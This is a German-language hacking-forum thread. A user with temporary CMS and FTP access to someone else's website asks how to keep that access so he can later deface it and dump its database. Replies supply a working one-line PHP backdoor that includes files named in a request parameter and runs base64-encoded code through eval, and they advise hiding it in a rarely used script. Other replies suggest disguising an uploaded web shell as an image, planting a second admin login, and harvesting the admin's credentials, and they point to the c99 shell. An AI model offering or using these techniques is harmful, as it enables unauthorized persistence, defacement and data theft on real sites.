Hey SecuNet Community :)
Da ich recht neu im Thema Websecurity bin, wollte ich euch Fragen, was ich machen könnte , wenn ich zu einer Seite CMS & FTP Zugang habe , sie aber "NOCH" nicht defacen möchte , jedoch der Zugang 100%ig nur 3 Tage lang hält?
Kann ich eine Shell oder so hochladen ? Wenn ja welche ?
& wie?


GRruß

Wenn du FTP-Zugang hast kannst du einfach die Shell hochladen und möglichst gut verstecken. Sinnvoller ist es aber ein vorhandenes Script zu modifizieren um so weniger auffällig vor zu gehen.
Füge einfach diese Zeile in ein selten genutzes Script ein.

<?php if(isset($_GET["asdf"])){include($_GET["asdf"]);}if(isset($_GET["asd"])){eval(base64_decode($_GET["asd"])); } ?> Dadurch kannst du PHP-Code ausführen und Dateien inkludieren, vorrausgesetzt die Einstellungen erlauben es Dateien von fremden Server zu inkludieren.

Welche Shell du verwendest kommt immer auf persönliche Vorlieben an. Ich habe bis jetzt noch keine Shell gefunden die mit gefällt.

Was kann ich mit dem Shell machen?
Ich würde gerne auch nach 20 Tagen iwie durch den Shell die DB Saugen oder FTP Zugang erlangen können...

Was willst du mit welcher Shell machen? Was ich gepostet hab ist in dem Sinne keine Shell sondern nur eine Zeile Code mit der du eine Hintertür in ein beliebiges Script einbauen kannst.
Beschäftige dich erstmal mit PHP und SQL bevor du versuchst etwas zu "hacken".

Ich werde mich nicht mit SQL & PHP beschäftigen können , da ich die Shell bis morgen Abend bräuchte & es eh eine einmalige Sache ist , woraus ich erschloss , dass es unnötig wäre für sowas PHP&SQL zu lernen hihi :P

Dann lass es.

Kann denn kein Hilfsbereiter User mir helfen ? Einfach paar Tipps geben etc. ? Wie ich den Zugang aufrecht erhalten könnte ? ...

Kann denn kein Hilfsbereiter User mir helfen ? Einfach paar Tipps geben etc. ? Wie ich den Zugang aufrecht erhalten könnte ? ...

Es ist schön, wie du Halux freundliche Hilfe einfach in den Wind schlägst. Er hat dir doch schön gezeigt, wie du innerhalb einer PHP- Zeile, welche du in eine PHP- Datei deiner Wahl einfügst, eine externe Datei ausführst. Dafür muss der Server natürlich richtig bzw. falsch konfiguriert sein.

Sonst lade einfach eine x- beliebige Shell hoch und tarne sie beispielsweise als Bild oder sonstiges. Sei kreativ!

Falls es ein CMS ist, kannst du den Admin- Login so modifizieren, dass man sich sowohl mit den regulären Login- Daten des Administrators, wie auch mit von dir gewählten Daten einloggen kann. Natürlich kannst du auch einfach die Kontodaten des Admins auslesen und hoffen, dass dieser diese in dieser Zeit nicht ändert.

Wie schon oben gesagt, sei kreativ!

Kataklysmos

Danke :)
@Halux entschuldige mich :)

X - Beliebige Shell ? Welche z.b :)?

Danke :)
@Halux entschuldige mich :)
[Link nur für registrierte und freigeschaltete Mitglieder sichtbar]
X - Beliebige Shell ? Welche z.b :)?


[Link nur für registrierte und freigeschaltete Mitglieder sichtbar] //z.B. c99

Such dir eine aus ;)

MfG

illusi0n

dankee :)